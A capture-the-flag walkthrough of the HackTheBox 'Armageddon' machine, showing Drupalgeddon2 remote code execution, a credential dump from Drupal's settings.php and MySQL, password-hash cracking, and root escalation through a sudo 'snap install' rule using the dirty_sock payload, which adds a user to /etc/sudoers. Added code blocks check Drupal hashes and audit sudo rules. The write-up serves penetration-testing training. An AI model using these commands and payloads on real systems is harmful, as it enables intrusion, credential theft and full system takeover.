Recon
nmap x rustscan
└─$ rustscan -a 10.10.10.233 -b 10000 -- -A -Pn -sV -T5
The Modern Day Port Scanner.
Open 10.10.10.233:22
Open 10.10.10.233:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries /includes/ /misc/ /modules/ /profiles/ /scripts/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ /?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
We now know that we are targeting a CentOS box with Drupal installed. Drupal is a free and open-source web content management system written in PHP.
dirbuster
The dirbuster scan turned up several files and directories. We found a changelog file at http://10.10.10.233/CHANGELOG.txt that gives us the Drupal version: the box is potentially running Drupal 7.56.
Vulnerabilities finding
Running searchsploit, we find multiple exploits affecting that version.
└─$ searchsploit drupal 7.5
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb
-------------------------------------------------------------------------------- ---------------------------------
We don't have an account, so one exploit is left: Drupalgeddon2.
Oh, it sounds like the box name :)
└─$ ruby 44449.rb http://10.10.10.233
armageddon.htb>> whoami
apache
We have a shell! We are now running as the apache user.
Local recon
Listing the listening network sockets (netstat output):
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
In the /var/www/html directory we found a .gitignore file. Such a file may list paths to sensitive files.
armageddon.htb>> cat /var/www/html/.gitignore
# Ignore configuration files that may contain sensitive information.
sites/*/settings*.php
# Ignore paths that contain user-generated content.
sites/*/files
sites/*/private
There is an interesting file: /var/www/html/sites/default/settings.php. In this file we find cleartext credentials for the MySQL server.
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
We can dump the content of the users table from the drupal database.
armageddon.htb>> mysql --user=drupaluser --password='CQHEy@9M*m23gBVj' -D drupal -e 'select * from users;'
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
3 toto $S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw alt.du-9lbv0xo@yopmail.com filtered_html 1661977417 0 0 0 Europe/London 0 alt.du-9lbv0xo@yopmail.com NULL
We obtain two users and their password hashes:
brucetherealadmin:$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
toto:$S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw
Trying to brute-force bruce's hash with john:
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
We get his password: booboo. We are now able to log in to the website, or over SSH, with the credentials brucetherealadmin:booboo.
We can get the user flag!
[brucetherealadmin@armageddon ~]$ cat /home/brucetherealadmin/user.txt
*************************78ed36c
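The $S$ hashes dumped above use Drupal 7's phpass-derived scheme: a work-factor character, an 8-character salt and 2^n rounds of SHA-512, truncated to 55 characters. The following Python is an added example (not part of the writeup, and not Drupal's own code, though it follows the algorithm in includes/password.inc) that parses the setting prefix and verifies a candidate against brucetherealadmin's hash; it shows that 32768 rounds are no obstacle when the password itself is a dictionary word, which is why the wordlist attack above succeeds immediately.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55  # Drupal 7 stores only the first 55 characters
BRUCE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"  # from the users dump

def _b64_encode(data: bytes) -> str:
    """phpass-style base64 used by Drupal (not RFC 4648), 6 bits per char."""
    out, i, count = [], 0, len(data)
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(stored: str):
    """Return (rounds, salt) from the 12-character setting prefix of a $S$ hash."""
    if not stored.startswith("$S$") or len(stored) < 12:
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
        raise ValueError("iteration count out of range")
    return 1 << count_log2, stored[4:12]

def drupal7_hash(password: str, setting: str) -> str:
    """Recompute the hash of `password` with the salt and rounds in `setting`."""
    rounds, salt = parse_setting(setting)
    pw = password.encode()
    h = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(rounds):  # PHP: do { hash(hash . pw) } while (--count)
        h = hashlib.sha512(h + pw).digest()
    return (setting[:12] + _b64_encode(h))[:DRUPAL_HASH_LENGTH]

def check_password(password: str, stored: str) -> bool:
    return hmac.compare_digest(drupal7_hash(password, stored), stored)
```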
Path to the privesc
When listing bruce's privileges, we see that he can run snap install with root rights.
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
    LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
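The rule above, (root) NOPASSWD: /usr/bin/snap install *, hands the user a root-run command with a wildcard argument. The following Python is an added example (not part of the writeup) that parses sudo -l output and flags such rules, the kind of check a host-hardening review would run; the sample input embeds the rule from the box plus one constructed, tighter rule for contrast.

```python
import re

# Constructed sample: the rule shown in the writeup plus one hypothetical
# tighter rule (the systemctl line is NOT on the box, it is here for contrast).
SUDO_L_OUTPUT = """\
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, env_reset, secure_path=/sbin:/bin:/usr/sbin:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
    (root) /usr/bin/systemctl restart httpd
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<rest>.*\S)\s*$")
TAG_RE = re.compile(r"^([A-Z]+):\s*")  # NOPASSWD:, SETENV:, ...

def parse_sudo_l(text):
    """Return the rules listed after 'may run the following commands' as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        rest, tags = m.group("rest"), []
        while (t := TAG_RE.match(rest)):
            tags.append(t.group(1))
            rest = rest[t.end():]
        rules.append({"runas": m.group("runas"), "tags": tags, "command": rest})
    return rules

def risk_findings(rule):
    """Reasons a rule deserves attention; an empty list means none found."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("runs without a password prompt")
    if rule["command"] == "ALL" or "*" in rule["command"]:
        findings.append("wildcard lets the caller choose the arguments")
    words = rule["command"].split()
    if words[0].endswith("/snap") and "install" in words[1:]:
        findings.append("installing a caller-supplied snap runs its hooks as root")
    return findings

def audit(text):
    """Map each sudo command to its findings."""
    return {r["command"]: risk_findings(r) for r in parse_sudo_l(text)}
```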
I first searched exploit-db to see if a privilege escalation for snap exists.
└─$ searchsploit snapd
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
--------------------------------------------------------------------- ---------------------------------
[brucetherealadmin@armageddon ~]$ snap --version
snap 2.47.1-1.el7
snapd 2.47.1-1.el7
The exploit does not work as is. We will reuse the payload embedded in the script and write it out as a snap file.
The payload creates a user (dirty_sock), adds it to the sudo group and to /etc/sudoers, allowing it to use the sudo command.
#!/bin/bash
useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock ALL=(ALL:ALL) ALL" >> /etc/sudoers
We can write a simple Python script that decodes the base64 payload and writes it to the file exploit.snap:
import base64

# Base64 blob of the dirty_sock snap, copied from the exploit script and
# padded with 'A' characters and '==' exactly as the original script does.
SNAP = ('''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'''
        + 'A' * 4256 + '==')

# Decode the blob and write the snap package; the with-block closes the file.
blob = base64.b64decode(SNAP)
with open("exploit.snap", "wb") as f:
    f.write(blob)
Then we can run snap install with root privileges.
[brucetherealadmin@armageddon tmp]$ sudo snap install --dangerous --devmode exploit.snap
dirty-sock 0.1 installed
# checking user presence
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd
dirty_sock:x:1001:1001::/home/dirty_sock:/bin/bash
Our new user has been created; we can now get the root flag!
[brucetherealadmin@armageddon tmp]$ su dirty_sock
Mot de passe : dirty_sock
[dirty_sock@armageddon /]$ sudo cat /root/root.txt
*************************70c28a3
PHP, Password Reuse, Easy, External, Drupal, Penetration Tester Level 1, CVE Exploitation, CVE-2018-7600, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Credentials, A07:2021-Identification And Authentication Failures, Source Code Review, Clear Text Credentials, Authentication, Password Cracking, Sudo Exploitation